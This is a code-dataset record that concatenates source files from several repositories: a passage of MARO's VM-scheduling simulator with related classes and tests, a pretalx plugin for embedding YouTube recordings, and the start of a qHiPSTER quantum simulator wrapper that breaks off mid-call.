amount += pm_type["amount"]
return amount
def _init_pms(self):
"""Initialize the physical machines based on the config setting. The PM id starts from 0."""
# TODO: Improve the scalability. Like the use of multiple PM sets.
self._machines = self._frame.pms
# PM type dictionary.
self._pm_type_dict: dict = {}
pm_id = 0
for pm_type in self._config.PM:
amount = pm_type["amount"]
self._pm_type_dict[pm_type["PM_type"]] = pm_type
while amount > 0:
pm = self._machines[pm_id]
pm.set_init_state(
id=pm_id,
cpu_cores_capacity=pm_type["CPU"],
memory_capacity=pm_type["memory"],
pm_type=pm_type["PM_type"],
oversubscribable=PmState.EMPTY
)
amount -= 1
pm_id += 1
def reset(self):
"""Reset internal states for episode."""
self._total_vm_requests: int = 0
self._total_energy_consumption: float = 0.0
self._successful_allocation: int = 0
self._successful_completion: int = 0
self._failed_allocation: int = 0
self._failed_completion: int = 0
self._total_latency: Latency = Latency()
self._total_oversubscriptions: int = 0
self._total_overload_pms: int = 0
self._total_overload_vms: int = 0
self._frame.reset()
self._snapshots.reset()
for pm in self._machines:
pm.reset()
self._live_vms.clear()
self._pending_vm_request_payload.clear()
self._vm_reader.reset()
self._vm_item_picker = self._vm_reader.items_tick_picker(self._start_tick, self._max_tick, time_unit="s")
self._cpu_reader.reset()
def _init_frame(self):
self._frame = build_frame(self._pm_amount, self.calc_max_snapshots())
self._snapshots = self._frame.snapshots
def step(self, tick: int):
"""Push business to next step.
Args:
tick (int): Current tick to process.
"""
self._tick = tick
# All vm's cpu utilization at current tick.
cur_tick_cpu_utilization = self._cpu_reader.items(tick=tick)
# Process finished VMs.
self._process_finished_vm()
# Update all live VMs CPU utilization.
self._update_vm_workload(cur_tick_cpu_utilization=cur_tick_cpu_utilization)
# Update all PM CPU utilization.
self._update_pm_workload()
for vm in self._vm_item_picker.items(tick):
# TODO: Batch request support.
vm_info = VirtualMachine(
id=vm.vm_id,
cpu_cores_requirement=vm.vm_cpu_cores,
memory_requirement=vm.vm_memory,
lifetime=vm.vm_lifetime,
sub_id=vm.sub_id,
deployment_id=vm.deploy_id,
category=VmCategory(vm.vm_category)
)
if vm.vm_id not in cur_tick_cpu_utilization:
raise Exception(f"The VM id: '{vm.vm_id}' does not exist at this tick.")
vm_info.add_utilization(cpu_utilization=cur_tick_cpu_utilization[vm.vm_id])
vm_req_payload: VmRequestPayload = VmRequestPayload(
vm_info=vm_info,
remaining_buffer_time=self._buffer_time_budget
)
vm_request_event = self._event_buffer.gen_cascade_event(
tick=tick,
event_type=Events.REQUEST,
payload=vm_req_payload
)
self._event_buffer.insert_event(event=vm_request_event)
self._total_vm_requests += 1
def post_step(self, tick: int):
# Update energy to the environment metrices.
total_energy: float = 0.0
for pm in self._machines:
if pm.oversubscribable and pm.cpu_cores_allocated > pm.cpu_cores_capacity:
self._total_oversubscriptions += 1
total_energy += pm.energy_consumption
# Overload PMs.
if pm.cpu_utilization > 100:
self._overload(pm.id)
self._total_energy_consumption += total_energy
if (tick + 1) % self._snapshot_resolution == 0:
# NOTE: We should use frame_index method to get correct index in snapshot list.
self._frame.take_snapshot(self.frame_index(tick))
# Stop current episode if we reach max tick.
return tick + 1 >= self._max_tick
def get_event_payload_detail(self) -> dict:
"""dict: Event payload details of current scenario."""
return {
Events.REQUEST.name: VmRequestPayload.summary_key,
MaroEvents.PENDING_DECISION.name: DecisionPayload.summary_key
}
def get_agent_idx_list(self) -> List[int]:
"""Get a list of agent index."""
pass
def get_node_mapping(self) -> dict:
"""dict: Node mapping."""
node_mapping = {}
return node_mapping
def get_vm_cpu_utilization_series(self, vm_id: int) -> List[float]:
"""Get the CPU utilization series of the specific VM by the given ID."""
if vm_id in self._live_vms:
return self._live_vms[vm_id].get_historical_utilization_series(cur_tick=self._tick)
return []
def get_metrics(self) -> DocableDict:
"""Get current environment metrics information.
Returns:
DocableDict: Metrics information.
"""
return DocableDict(
metrics_desc,
total_vm_requests=self._total_vm_requests,
total_energy_consumption=self._total_energy_consumption,
successful_allocation=self._successful_allocation,
successful_completion=self._successful_completion,
failed_allocation=self._failed_allocation,
failed_completion=self._failed_completion,
total_latency=self._total_latency,
total_oversubscriptions=self._total_oversubscriptions,
total_overload_pms=self._total_overload_pms,
total_overload_vms=self._total_overload_vms
)
def _register_events(self):
# Register our own events and their callback handlers.
self._event_buffer.register_event_handler(event_type=Events.REQUEST, handler=self._on_vm_required)
# Generate decision event.
self._event_buffer.register_event_handler(event_type=MaroEvents.TAKE_ACTION, handler=self._on_action_received)
def _update_vm_workload(self, cur_tick_cpu_utilization: dict):
"""Update all live VMs CPU utilization.
The length of VMs utilization series could be difference among all VMs,
because index 0 represents the VM's CPU utilization at the tick it starts.
"""
for live_vm in self._live_vms.values():
# NOTE: Some data could be lost. We use -1.0 to represent the missing data.
if live_vm.id not in cur_tick_cpu_utilization:
live_vm.add_utilization(cpu_utilization=-1.0)
else:
live_vm.add_utilization(cpu_utilization=cur_tick_cpu_utilization[live_vm.id])
live_vm.cpu_utilization = live_vm.get_utilization(cur_tick=self._tick)
for pending_vm_payload in self._pending_vm_request_payload.values():
pending_vm = pending_vm_payload.vm_info
if pending_vm.id not in cur_tick_cpu_utilization:
pending_vm.add_utilization(cpu_utilization=-1.0)
else:
pending_vm.add_utilization(cpu_utilization=cur_tick_cpu_utilization[pending_vm.id])
def _update_pm_workload(self):
"""Update CPU utilization occupied by total VMs on each PM."""
for pm in self._machines:
total_pm_cpu_cores_used: float = 0.0
for vm_id in pm.live_vms:
vm = self._live_vms[vm_id]
total_pm_cpu_cores_used += vm.cpu_utilization * vm.cpu_cores_requirement
pm.update_cpu_utilization(vm=None, cpu_utilization=total_pm_cpu_cores_used / pm.cpu_cores_capacity)
pm.energy_consumption = self._cpu_utilization_to_energy_consumption(
pm_type=self._pm_type_dict[pm.pm_type],
cpu_utilization=pm.cpu_utilization
)
def _overload(self, pm_id: int):
"""Overload logic.
Currently only support killing all VMs on the overload PM and note them as failed allocations.
"""
# TODO: Future features of overload modeling.
# 1. Performance degradation
# 2. Quiesce specific VMs.
pm: PhysicalMachine = self._machines[pm_id]
vm_ids: List[int] = [vm_id for vm_id in pm.live_vms]
if self._kill_all_vms_if_overload:
for vm_id in vm_ids:
self._live_vms.pop(vm_id)
pm.deallocate_vms(vm_ids=vm_ids)
self._failed_completion += len(vm_ids)
self._total_overload_vms += len(vm_ids)
def _cpu_utilization_to_energy_consumption(self, pm_type: dict, cpu_utilization: float) -> float:
"""Convert the CPU utilization to energy consumption.
The formulation refers to https://dl.acm.org/doi/epdf/10.1145/1273440.1250665
"""
power: float = pm_type["power_curve"]["calibration_parameter"]
busy_power: int = pm_type["power_curve"]["busy_power"]
idle_power: int = pm_type["power_curve"]["idle_power"]
cpu_utilization /= 100
cpu_utilization = min(1, cpu_utilization)
return idle_power + (busy_power - idle_power) * (2 * cpu_utilization - pow(cpu_utilization, power))
def _postpone_vm_request(self, postpone_type: PostponeType, vm_id: int, remaining_buffer_time: int):
"""Postpone VM request."""
if remaining_buffer_time >= self._delay_duration:
if postpone_type == PostponeType.Resource:
self._total_latency.due_to_resource += self._delay_duration
elif postpone_type == PostponeType.Agent:
self._total_latency.due_to_agent += self._delay_duration
postpone_payload = self._pending_vm_request_payload[vm_id]
postpone_payload.remaining_buffer_time -= self._delay_duration
postpone_event = self._event_buffer.gen_cascade_event(
tick=self._tick + self._delay_duration,
event_type=Events.REQUEST,
payload=postpone_payload
)
self._event_buffer.insert_event(event=postpone_event)
else:
# Fail
# Pop out VM request payload.
self._pending_vm_request_payload.pop(vm_id)
# Add failed allocation.
self._failed_allocation += 1
def _get_valid_pms(
self, vm_cpu_cores_requirement: int, vm_memory_requirement: int, vm_category: VmCategory
) -> List[int]:
"""Check all valid PMs.
Args:
vm_cpu_cores_requirement (int): The CPU cores requested by the VM.
vm_memory_requirement (int): The memory requested by the VM.
vm_category (VmCategory): The VM category. Delay-insensitive: 0, Interactive: 1, Unknown: 2.
"""
# NOTE: Should we implement this logic inside the action scope?
valid_pm_list = []
# Delay-insensitive: 0, Interactive: 1, and Unknown: 2.
if vm_category == VmCategory.INTERACTIVE or vm_category == VmCategory.UNKNOWN:
valid_pm_list = self._get_valid_non_oversubscribable_pms(
vm_cpu_cores_requirement=vm_cpu_cores_requirement,
vm_memory_requirement=vm_memory_requirement
)
else:
valid_pm_list = self._get_valid_oversubscribable_pms(
vm_cpu_cores_requirement=vm_cpu_cores_requirement,
vm_memory_requirement=vm_memory_requirement
)
return valid_pm_list
def _get_valid_non_oversubscribable_pms(self, vm_cpu_cores_requirement: int, vm_memory_requirement: int) -> list:
valid_pm_list = []
for pm in self._machines:
if pm.oversubscribable == PmState.EMPTY or pm.oversubscribable == PmState.NON_OVERSUBSCRIBABLE:
# In the condition of non-oversubscription, the valid PMs mean:
# PM allocated resource + VM allocated resource <= PM capacity.
if (pm.cpu_cores_allocated + vm_cpu_cores_requirement <= pm.cpu_cores_capacity
and pm.memory_allocated + vm_memory_requirement <= pm.memory_capacity):
valid_pm_list.append(pm.id)
return valid_pm_list
def _get_valid_oversubscribable_pms(self, vm_cpu_cores_requirement: int, vm_memory_requirement: int) -> List[int]:
valid_pm_list = []
for pm in self._machines:
if pm.oversubscribable == PmState.EMPTY or pm.oversubscribable == PmState.OVERSUBSCRIBABLE:
# In the condition of oversubscription, the valid PMs mean:
# 1. PM allocated resource + VM allocated resource <= Max oversubscription rate * PM capacity.
# 2. PM CPU usage + VM requirements <= Max utilization rate * PM capacity.
if (
(
pm.cpu_cores_allocated + vm_cpu_cores_requirement
<= self._max_cpu_oversubscription_rate * pm.cpu_cores_capacity
) and (
pm.memory_allocated + vm_memory_requirement
<= self._max_memory_oversubscription_rate * pm.memory_capacity
) and (
pm.cpu_utilization / 100 * pm.cpu_cores_capacity + vm_cpu_cores_requirement
<= self._max_utilization_rate * pm.cpu_cores_capacity
)
):
valid_pm_list.append(pm.id)
return valid_pm_list
def _process_finished_vm(self):
"""Release PM resource from the finished VM."""
# Get the VM info.
vm_id_list = []
for vm in self._live_vms.values():
if vm.deletion_tick == self._tick:
# Release PM resources.
pm: PhysicalMachine = self._machines[vm.pm_id]
pm.cpu_cores_allocated -= vm.cpu_cores_requirement
pm.memory_allocated -= vm.memory_requirement
pm.deallocate_vms(vm_ids=[vm.id])
# If the VM list is empty, switch the state to empty.
if not pm.live_vms:
pm.oversubscribable = PmState.EMPTY
vm_id_list.append(vm.id)
# VM completed task succeed.
self._successful_completion += 1
# Remove dead VM.
for vm_id in vm_id_list:
self._live_vms.pop(vm_id)
def _on_vm_required(self, vm_request_event: CascadeEvent):
"""Callback when there is a VM request generated."""
# Get VM data from payload.
payload: VmRequestPayload = vm_request_event.payload
vm_info: VirtualMachine = payload.vm_info
remaining_buffer_time: int = payload.remaining_buffer_time
# Store the payload inside business engine.
self._pending_vm_request_payload[vm_info.id] = payload
# Get valid pm list.
valid_pm_list = self._get_valid_pms(
vm_cpu_cores_requirement=vm_info.cpu_cores_requirement,
vm_memory_requirement=vm_info.memory_requirement,
vm_category=vm_info.category
)
if len(valid_pm_list) > 0:
# Generate pending decision.
decision_payload = DecisionPayload(
frame_index=self.frame_index(tick=self._tick),
valid_pms=valid_pm_list,
vm_id=vm_info.id,
vm_cpu_cores_requirement=vm_info.cpu_cores_requirement,
vm_memory_requirement=vm_info.memory_requirement,
remaining_buffer_time=remaining_buffer_time
)
self._pending_action_vm_id = vm_info.id
pending_decision_event = self._event_buffer.gen_decision_event(
tick=vm_request_event.tick, payload=decision_payload)
vm_request_event.add_immediate_event(event=pending_decision_event)
else:
# Either postpone the requirement event or failed.
self._postpone_vm_request(
postpone_type=PostponeType.Resource,
vm_id=vm_info.id,
remaining_buffer_time=remaining_buffer_time
)
def _on_action_received(self, event: CascadeEvent):
"""Callback wen we get an action from agent."""
action = None
if event is None or event.payload is None:
self._pending_vm_request_payload.pop(self._pending_action_vm_id)
return
cur_tick: int = event.tick
for action in event.payload:
vm_id: int = action.vm_id
if vm_id not in self._pending_vm_request_payload:
raise Exception(f"The VM id: '{vm_id}' sent by agent is invalid.")
if type(action) == AllocateAction:
pm_id = action.pm_id
vm: VirtualMachine = self._pending_vm_request_payload[vm_id].vm_info
lifetime = vm.lifetime
# Update VM information.
vm.pm_id = pm_id
vm.creation_tick = cur_tick
vm.deletion_tick = cur_tick + lifetime
vm.cpu_utilization = vm.get_utilization(cur_tick=cur_tick)
# Pop out the VM from pending requests and add to live VM dict.
self._pending_vm_request_payload.pop(vm_id)
self._live_vms[vm_id] = vm
# Update PM resources requested by VM.
pm = self._machines[pm_id]
# Empty pm (init state).
if pm.oversubscribable == PmState.EMPTY:
# Delay-Insensitive: oversubscribable.
if vm.category == VmCategory.DELAY_INSENSITIVE:
pm.oversubscribable = PmState.OVERSUBSCRIBABLE
# Interactive or Unknown: non-oversubscribable
else:
pm.oversubscribable = PmState.NON_OVERSUBSCRIBABLE
pm.allocate_vms(vm_ids=[vm.id])
pm.cpu_cores_allocated += vm.cpu_cores_requirement
pm.memory_allocated += vm.memory_requirement
pm.update_cpu_utilization(
vm=vm,
cpu_utilization=None
)
pm.energy_consumption = self._cpu_utilization_to_energy_consumption(
pm_type=self._pm_type_dict[pm.pm_type],
cpu_utilization=pm.cpu_utilization
)
self._successful_allocation += 1
elif type(action) == PostponeAction:
postpone_step = action.postpone_step
remaining_buffer_time = self._pending_vm_request_payload[vm_id].remaining_buffer_time
# Either postpone the requirement event or failed.
self._postpone_vm_request(
postpone_type=PostponeType.Agent,
vm_id=vm_id,
remaining_buffer_time=remaining_buffer_time - postpone_step * self._delay_duration
)
def _download_processed_data(self):
"""Build processed data."""
data_root = StaticParameter.data_root
build_folder = os.path.join(data_root, self._scenario_name, ".build", self._topology)
source = self._config.PROCESSED_DATA_URL
download_file_name = source.split('/')[-1]
download_file_path = os.path.join(build_folder, download_file_name)
# Download file from the Azure blob storage.
if not os.path.exists(download_file_path):
logger.info_green(f"Downloading data from {source} to {download_file_path}.")
download_file(source=source, destination=download_file_path)
else:
logger.info_green("File already exists, skipping download.")
# Unzip files.
logger.info_green(f"Unzip {download_file_path} to {build_folder}")
tar = tarfile.open(download_file_path, "r:gz")
tar.extractall(path=build_folder)
tar.close()
# Move to the correct path.
for _, directories, _ in os.walk(build_folder):
for directory in directories:
unzip_file = os.path.join(build_folder, directory)
logger.info_green(f"Move files to {build_folder} from {unzip_file}")
for file_name in os.listdir(unzip_file):
if file_name.endswith(".bin"):
shutil.move(os.path.join(unzip_file, file_name), build_folder)
os.rmdir(unzip_file)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.backends.frame import FrameBase, FrameNode
from .physical_machine import PhysicalMachine
def build_frame(pm_amount: int, snapshots_num: int):
"""Function to build vm_scheduling Frame.
Args:
pm_amount (int): Number of physical machine.
snapshot_num (int): Number of in-memory snapshots.
Returns:
VmSchedulingFrame: Frame instance for vm_scheduling scenario.
"""
class VmSchedulingFrame(FrameBase):
pms = FrameNode(PhysicalMachine, pm_amount)
def __init__(self):
super().__init__(enable_snapshot=True, total_snapshot=snapshots_num)
return VmSchedulingFrame()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import List, Set
from maro.backends.frame import NodeAttribute, NodeBase, node
from .enums import PmState
from .virtual_machine import VirtualMachine
@node("pms")
class PhysicalMachine(NodeBase):
"""Physical machine node definition in frame."""
# Initial parameters.
id = NodeAttribute("i")
cpu_cores_capacity = NodeAttribute("i2")
memory_capacity = NodeAttribute("i2")
pm_type = NodeAttribute("i2")
# Statistical features.
cpu_cores_allocated = NodeAttribute("i2")
memory_allocated = NodeAttribute("i2")
cpu_utilization = NodeAttribute("f")
energy_consumption = NodeAttribute("f")
# PM type: non-oversubscribable is -1, empty: 0, oversubscribable is 1.
oversubscribable = NodeAttribute("i2")
def __init__(self):
"""Internal use for reset."""
self._id = 0
self._init_cpu_cores_capacity = 0
self._init_memory_capacity = 0
self._init_pm_type = 0
self._init_pm_state = 0
# PM resource.
self._live_vms: Set[int] = set()
def update_cpu_utilization(self, vm: VirtualMachine = None, cpu_utilization: float = None):
if vm is None and cpu_utilization is None:
raise Exception(f"Wrong calling method {self.update_cpu_utilization.__name__}")
if vm is not None:
cpu_utilization = (
(self.cpu_cores_capacity * self.cpu_utilization + vm.cpu_cores_requirement * vm.cpu_utilization)
/ self.cpu_cores_capacity
)
self.cpu_utilization = round(max(0, cpu_utilization), 2)
def set_init_state(
self, id: int, cpu_cores_capacity: int, memory_capacity: int, pm_type: int, oversubscribable: PmState = 0
):
"""Set initialize state, that will be used after frame reset.
Args:
id (int): PM id, from 0 to N. N means the amount of PM, which can be set in config.
cpu_cores_capacity (int): The capacity of cores of the PM, which can be set in config.
memory_capacity (int): The capacity of memory of the PM, which can be set in config.
pm_type (int): The type of the PM.
oversubscribable (int): The state of the PM:
- non-oversubscribable: -1.
- empty: 0.
- oversubscribable: 1.
"""
self._id = id
self._init_cpu_cores_capacity = cpu_cores_capacity
self._init_memory_capacity = memory_capacity
self._init_pm_type = pm_type
self._init_pm_state = oversubscribable
self.reset()
def reset(self):
"""Reset to default value."""
# When we reset frame, all the value will be set to 0, so we need these lines.
self.id = self._id
self.cpu_cores_capacity = self._init_cpu_cores_capacity
self.memory_capacity = self._init_memory_capacity
self.pm_type = self._init_pm_type
self.oversubscribable = self._init_pm_state
self._live_vms.clear()
self.cpu_cores_allocated = 0
self.memory_allocated = 0
self.cpu_utilization = 0.0
self.energy_consumption = 0.0
@property
def live_vms(self) -> Set[int]:
return self._live_vms
def allocate_vms(self, vm_ids: List[int]):
for vm_id in vm_ids:
self._live_vms.add(vm_id)
def deallocate_vms(self, vm_ids: List[int]):
for vm_id in vm_ids:
self._live_vms.remove(vm_id)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .base_exception import MAROException
class AgentManagerModeError(MAROException):
"""Wrong agent manager mode."""
def __init__(self, msg: str = None):
super().__init__(4000, msg)
class MissingShaper(MAROException):
"""Missing shaper."""
def __init__(self, msg: str = None):
super().__init__(4001, msg)
class StoreMisalignment(MAROException):
"""Raised when a ``put`` operation on a ``ColumnBasedStore`` would cause the underlying lists to have different
sizes."""
def __init__(self, msg: str = None):
super().__init__(4002, msg)
class InvalidEpisode(MAROException):
"""Raised when the ``max_episode`` passed to the the ``SimpleLearner``'s ``train`` method is negative and not -1."""
def __init__(self, msg: str = None):
super().__init__(4003, msg)
class InfiniteTrainingLoop(MAROException):
"""Raised when the ``SimpleLearner``'s training loop becomes infinite."""
def __init__(self, msg: str = None):
super().__init__(4004, msg)
class MissingOptimizer(MAROException):
"""Raised when the optimizers are missing when calling LearningModel's step() method."""
def __init__(self, msg: str = None):
super().__init__(4005, msg)
class UnrecognizedTask(MAROException):
"""Raised when a LearningModel has task names that are not unrecognized by an algorithm."""
def __init__(self, msg: str = None):
super().__init__(4006, msg)
class NNStackDimensionError(MAROException):
"""Raised when a learning module's input dimension is incorrect."""
def __init__(self, msg: str = None):
super().__init__(4007, msg)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import unittest
from maro.data_lib import BinaryConverter
from maro.simulator.scenarios.vm_scheduling import CpuReader
class CpuReaderTest(unittest.TestCase):
for i in range(1, 4):
meta_file = "tests/data/vm_scheduling/cpu_readings.yml"
bin_file_name = f"tests/data/vm_scheduling/vm_cpu_readings-file-{i}-of-test.bin"
csv_file = f"tests/data/vm_scheduling/vm_cpu_readings-file-{i}-of-test.csv"
converter = BinaryConverter(bin_file_name, meta_file)
converter.add_csv(csv_file)
converter.flush()
data_path = "tests/data/vm_scheduling/vm_cpu_readings-file-1-of-test.bin"
def setUp(self):
self.cpu_reader = CpuReader(self.data_path, 0)
def tearDown(self):
self.cpu_reader.reset()
def test_first_file_first_tick(self):
cpu_utilization_dict = self.cpu_reader.items(tick=0)
expected = 4
self.assertEqual(expected, len(cpu_utilization_dict))
def test_first_file_last_tick(self):
cpu_utilization_dict = self.cpu_reader.items(tick=1)
expected = 13
self.assertEqual(expected, len(cpu_utilization_dict))
def test_switch_file(self):
cpu_utilization_dict = self.cpu_reader.items(tick=1)
cpu_utilization_dict = self.cpu_reader.items(tick=2)
expected = 8
self.assertEqual(expected, len(cpu_utilization_dict))
def test_last_file(self):
cpu_utilization_dict = {}
for i in range(3):
cpu_utilization_dict = self.cpu_reader.items(tick=i)
expected = 8
self.assertEqual(expected, len(cpu_utilization_dict))
cpu_utilization_dict = self.cpu_reader.items(tick=3)
expected = 7
self.assertEqual(expected, len(cpu_utilization_dict))
def test_reset(self):
self.cpu_reader.items(tick=0)
self.cpu_reader.items(tick=1)
self.cpu_reader.items(tick=2)
self.cpu_reader.items(tick=3)
self.cpu_reader.reset()
cpu_utilization_dict = self.cpu_reader.items(tick=0)
expected = 4
self.assertEqual(expected, len(cpu_utilization_dict))
cpu_utilization_dict = self.cpu_reader.items(tick=1)
expected = 13
self.assertEqual(expected, len(cpu_utilization_dict))
cpu_utilization_dict = self.cpu_reader.items(tick=2)
expected = 8
self.assertEqual(expected, len(cpu_utilization_dict))
def test_start_tick_not_in_first_file(self):
self.cpu_reader = CpuReader(self.data_path, 2)
cpu_utilization_dict = self.cpu_reader.items(tick=2)
expected = 8
self.assertEqual(expected, len(cpu_utilization_dict))
cpu_utilization_dict = self.cpu_reader.items(tick=3)
expected = 7
self.assertEqual(expected, len(cpu_utilization_dict))
if __name__ == "__main__":
unittest.main()
|
[
"/examples/cim/dqn/components/__init__.py",
"/examples/cim/dqn/components/agent.py",
"/examples/cim/dqn/components/agent_manager.py",
"/examples/cim/dqn/components/config.py",
"/examples/cim/dqn/dist_actor.py",
"/examples/cim/dqn/dist_learner.py",
"/examples/cim/dqn/single_process_launcher.py",
"/examples/cim/policy_optimization/components/__init__.py",
"/examples/cim/policy_optimization/components/agent_manager.py",
"/examples/cim/policy_optimization/components/experience_shaper.py",
"/examples/cim/policy_optimization/dist_actor.py",
"/examples/cim/policy_optimization/dist_learner.py",
"/examples/cim/policy_optimization/multi_process_launcher.py",
"/examples/cim/policy_optimization/single_process_launcher.py",
"/examples/vm_scheduling/best_fit/launcher.py",
"/examples/vm_scheduling/random/launcher.py",
"/maro/cli/grass/create.py",
"/maro/cli/grass/data.py",
"/maro/cli/grass/delete.py",
"/maro/cli/grass/executors/grass_azure_executor.py",
"/maro/cli/grass/executors/grass_executor.py",
"/maro/cli/grass/executors/grass_on_premises_executor.py",
"/maro/cli/grass/image.py",
"/maro/cli/grass/lib/agents/exception.py",
"/maro/cli/grass/lib/agents/master_agent.py",
"/maro/cli/grass/lib/agents/utils.py",
"/maro/cli/grass/lib/scripts/create_user.py",
"/maro/cli/grass/lib/scripts/delete_user.py",
"/maro/cli/grass/lib/scripts/init_build_node_image_vm.py",
"/maro/cli/grass/lib/scripts/init_node.py",
"/maro/cli/grass/node.py",
"/maro/cli/k8s/node.py",
"/maro/cli/process/agent/job_agent.py",
"/maro/cli/process/create.py",
"/maro/cli/process/delete.py",
"/maro/cli/process/executor.py",
"/maro/cli/process/utils/details.py",
"/maro/cli/utils/params.py",
"/maro/rl/__init__.py",
"/maro/rl/actor/__init__.py",
"/maro/rl/actor/simple_actor.py",
"/maro/rl/agent/__init__.py",
"/maro/rl/agent/abs_agent.py",
"/maro/rl/agent/abs_agent_manager.py",
"/maro/rl/agent/simple_agent_manager.py",
"/maro/rl/algorithms/__init__.py",
"/maro/rl/algorithms/abs_algorithm.py",
"/maro/rl/algorithms/dqn.py",
"/maro/rl/algorithms/policy_optimization.py",
"/maro/rl/dist_topologies/__init__.py",
"/maro/rl/dist_topologies/experience_collection.py",
"/maro/rl/learner/__init__.py",
"/maro/rl/learner/abs_learner.py",
"/maro/rl/learner/simple_learner.py",
"/maro/rl/models/__init__.py",
"/maro/rl/models/learning_model.py",
"/maro/rl/scheduling/scheduler.py",
"/maro/rl/scheduling/simple_parameter_scheduler.py",
"/maro/rl/shaping/__init__.py",
"/maro/rl/storage/__init__.py",
"/maro/simulator/scenarios/vm_scheduling/business_engine.py",
"/maro/simulator/scenarios/vm_scheduling/frame_builder.py",
"/maro/simulator/scenarios/vm_scheduling/physical_machine.py",
"/maro/utils/exception/rl_toolkit_exception.py",
"/tests/vm_scheduling/test_vm_scheduling_scenario.py"
] |
00mjk/pretalx-youtube
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy
class PluginApp(AppConfig):
name = "pretalx_youtube"
verbose_name = "YouTube integration"
class PretalxPluginMeta:
name = gettext_lazy("YouTube integration")
author = "Toshaan Bharvani"
description = gettext_lazy("Embed YouTube videos as session recordings")
visible = True
version = "0.0.1"
def ready(self):
from . import signals # NOQA
--- FILE SEPARATOR ---
from django import forms
from django.utils.translation import gettext_lazy as _
class YouTubeUrlForm(forms.Form):
youtube_url = forms.URLField(required=False)
def __init__(self, *args, **kwargs):
self.submission = kwargs.pop("submission")
initial = kwargs.get("initial", dict())
initial["youtube_url"] = self.submission.event.settings.get(
f"youtube_url_{self.submission.code}"
)
kwargs["initial"] = initial
super().__init__(*args, **kwargs)
self.fields["youtube_url"].label = self.submission.title
def clean_youtube_url(self):
from .recording import is_youtube_url
data = self.cleaned_data["youtube_url"]
if not is_youtube_url(data):
raise forms.ValidationError(_("Please provide a youtube.com URL!"))
return data
--- FILE SEPARATOR ---
from pretalx.agenda.recording import BaseRecordingProvider
def is_youtube_url(url):
return "www.youtube.com/" in url # TODO better validation
def get_embed_url(url):
if "www.youtube.com/embed" in url:
return url
if not is_youtube_url(url):
return
url = url[url.find("www.youtube.com/watch?v=") + len("www.youtube.com/watch?v=") :]
video_id = url
return f"https://www.youtube-nocookie.com/embed/{video_id}"
class YouTubeProvider(BaseRecordingProvider):
def get_recording(self, submission):
path = self.event.settings.get(f"youtube_url_{submission.code}")
if not path:
return
url = get_embed_url(path)
if not url:
return
iframe = f'<div class="embed-responsive embed-responsive-16by9"><iframe src="{url}" frameborder="0" allowfullscreen></iframe></div>'
csp_header = "https://www.youtube-nocookie.com"
return {"iframe": iframe, "csp_header": csp_header}
--- FILE SEPARATOR ---
from django.dispatch import receiver
from django.urls import reverse
from pretalx.agenda.signals import register_recording_provider
from pretalx.orga.signals import nav_event_settings
@receiver(register_recording_provider)
def youtube_provider(sender, **kwargs):
from .recording import YouTubeProvider
return YouTubeProvider(sender)
@receiver(nav_event_settings)
def youtube_settings(sender, request, **kwargs):
if not request.user.has_perm("orga.change_settings", request.event):
return []
return [
{
"label": "YouTube",
"url": reverse(
"plugins:pretalx_youtube:settings",
kwargs={"event": request.event.slug},
),
"active": request.resolver_match.url_name
== "plugins:pretalx_youtube:settings",
}
]
--- FILE SEPARATOR ---
from django.urls import re_path
from pretalx.event.models.event import SLUG_CHARS
from .views import YouTubeSettings
urlpatterns = [
re_path(
fr"^orga/event/(?P<event>[{SLUG_CHARS}]+)/settings/p/youtube/$",
YouTubeSettings.as_view(),
name="settings",
)
]
--- FILE SEPARATOR ---
from django.contrib import messages
from django.utils.translation import gettext_lazy as _
from django.views.generic import TemplateView
from pretalx.common.mixins.views import PermissionRequired
from pretalx.submission.models import Submission
from .forms import YouTubeUrlForm
class YouTubeSettings(PermissionRequired, TemplateView):
permission_required = "orga.change_settings"
template_name = "pretalx_youtube/settings.html"
def get_success_url(self):
return self.request.path
def get_object(self):
return self.request.event
def post(self, request, *args, **kwargs):
action = request.POST.get("action")
code = action[len("url_") :]
try:
submission = request.event.submissions.get(code=code)
except Submission.DoesNotExist:
messages.error(request, _("Could not find this talk."))
return super().get(request, *args, **kwargs)
form = YouTubeUrlForm(request.POST, submission=submission)
if not form.is_valid():
messages.error(request, form.errors)
return super().get(request, *args, **kwargs)
else:
request.event.settings.set(
f"youtube_url_{submission.code}",
form.cleaned_data["youtube_url"],
)
messages.success(request, _("The URL for this talk was updated."))
return super().get(request, *args, **kwargs)
return super().post(request, *args, **kwargs)
def get_context_data(self, *args, **kwargs):
kwargs = super().get_context_data(**kwargs)
kwargs["url_forms"] = [
YouTubeUrlForm(submission=submission)
for submission in self.request.event.talks
]
return kwargs
|
[
"/pretalx_youtube/apps.py",
"/pretalx_youtube/forms.py",
"/pretalx_youtube/recording.py",
"/pretalx_youtube/signals.py",
"/pretalx_youtube/urls.py",
"/pretalx_youtube/views.py"
] |
00mjk/qe-qhipster
|
import os
import subprocess
from zquantum.core.interfaces.backend import QuantumSimulator
from zquantum.core.circuit import save_circuit
from zquantum.core.measurement import (
load_wavefunction,
load_expectation_values,
sample_from_wavefunction,
Measurements,
)
from .utils import save_symbolic_operator, make_circuit_qhipster_compatible
from openfermion.ops import SymbolicOperator
import numpy as np
class QHipsterSimulator(QuantumSimulator):
supports_batching = False
def __init__(self, n_samples=None, nthreads=1):
super().__init__(n_samples=n_samples)
self.nthreads = nthreads
# NOTE: The environment variables that are set below are necessary for running qhipster with the intel psxe
# runtime installation. They were obtained through sourcing the script
# /app/usr/local/bin/compilers_and_library.sh which can be found in the zapatacomputing/qe-qhipster docker
# image.
os.putenv(
"LD_LIBRARY_PATH",
